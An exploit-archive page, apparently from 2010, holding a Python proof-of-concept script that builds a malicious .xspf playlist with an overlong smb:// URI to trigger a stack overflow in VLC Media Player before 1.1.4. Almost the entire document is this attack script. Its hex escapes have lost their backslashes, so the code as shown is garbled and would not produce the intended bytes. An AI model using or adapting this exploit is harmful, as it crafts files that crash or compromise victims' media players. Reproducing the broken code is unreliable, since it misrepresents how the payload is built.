VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC
# Published : 2010-09-04
# Author : hadji samir
# Previous Title : FCrackZip 1.0 Local Buffer Overflow Proof of Concept
# Next Title : FFDshow SEH Exception leading to NULL pointer on Read

#!/usr/bin/python
#
# Exploit Title:	VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC
# Date:			 04-09-2010
# Author:		Hadji Samir   , s-Dz[at]hotmail[dot]fr
# Software Link:	http://sourceforge.net/projects/vlc/files/1.1.4/win32/vlc-1.1.4-win32.exe/download?use_mirror=garr
# Version:		VLC Media Player < 1.1.4
# Tested on:	Windows XP sp2 with VLC 1.1.4 
# CVE :
# Notes:		Samir tjrs mahboul-3lik ...
#			 
###############################################################################################################		
  

data1 = (
"x3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31"
"x2Ex30x22x20x65x6Ex63x6Fx64x69x6Ex67x3Dx22x55x54"
"x46x2Dx38x22x3Fx3Ex0Dx0Ax3Cx70x6Cx61x79x6Cx69x73"
"x74x20x76x65x72x73x69x6Fx6Ex3Dx22x31x22x20x78x6D"  
"x6Cx6Ex73x3Dx22x68x74x74x70x3Ax2Fx2Fx77x77x77x2E" 
"x65x78x65x6Dx70x6Cx65x2Ex6Fx72x67x2Fx22x20x78x6D"  
"x6Cx6Ex73x3Ax76x6Cx63x3Dx22x68x74x74x70x3Ax2Fx2F" 
"x77x77x77x2Ex65x78x65x6Dx70x6Cx65x2Ex6Fx72x67x2F"  
"x22x3Ex0Dx0Ax09x3Cx74x69x74x6Cx65x3Ex50x6Cx61x79"  
"x6Cx69x73x74x3Cx2Fx74x69x74x6Cx65x3Ex0Dx0Ax09x3C" 
"x74x72x61x63x6Bx4Cx69x73x74x3Ex0Dx0Ax09x09x3Cx74"
"x72x61x63x6Bx3Ex0Dx0Ax09x09x09x3Cx6Cx6Fx63x61x74" 
"x69x6Fx6Ex3Ex73x6Dx62x3Ax2Fx2Fx65x78x61x6Dx70x6C" 
"x65x2Ex63x6Fx6Dx40x77x77x77x2Ex65x78x61x6Dx70x6C"  
"x65x2Ex63x6Fx6Dx2Fx23x7B") 

buff = ("x41" * 50000 )

data2 = ( 
"x7Dx3Cx2Fx6Cx6Fx63x61x74x69x6Fx6Ex3E"
"x3Cx65x78x74x65x6Ex73x69x6Fx6Ex20x61x70x70x6Cx69"
"x63x61x74x69x6Fx6Ex3Dx22x68x74x74x70x3Ax2Fx2Fx77"
"x77x77x2Ex76x69x64x65x6Fx6Cx61x6Ex2Ex6Fx72x67x2F" 
"x76x6Cx63x2Fx70x6Cx61x79x6Cx69x73x74x2Fx30x22x3E"
"x0Dx0Ax09x09x09x09x3Cx76x6Cx63x3Ax69x64x3Ex30x3C"  
"x2Fx76x6Cx63x3Ax69x64x3Ex0Dx0Ax09x09x09x3Cx2Fx65" 
"x78x74x65x6Ex73x69x6Fx6Ex3Ex0Dx0Ax09x09x3Cx2Fx74"
"x72x61x63x6Bx3Ex0Dx0Ax09x3Cx2Fx74x72x61x63x6Bx4C" 
"x69x73x74x3Ex0Dx0Ax3Cx2Fx70x6Cx61x79x6Cx69x73x74" 
"x3Ex0Dx0Ax0Dx0A") 

wizz = open("Mahboul-3lik.xspf","w") 
wizz.write(data1 + buff + data2) 
wizz.close()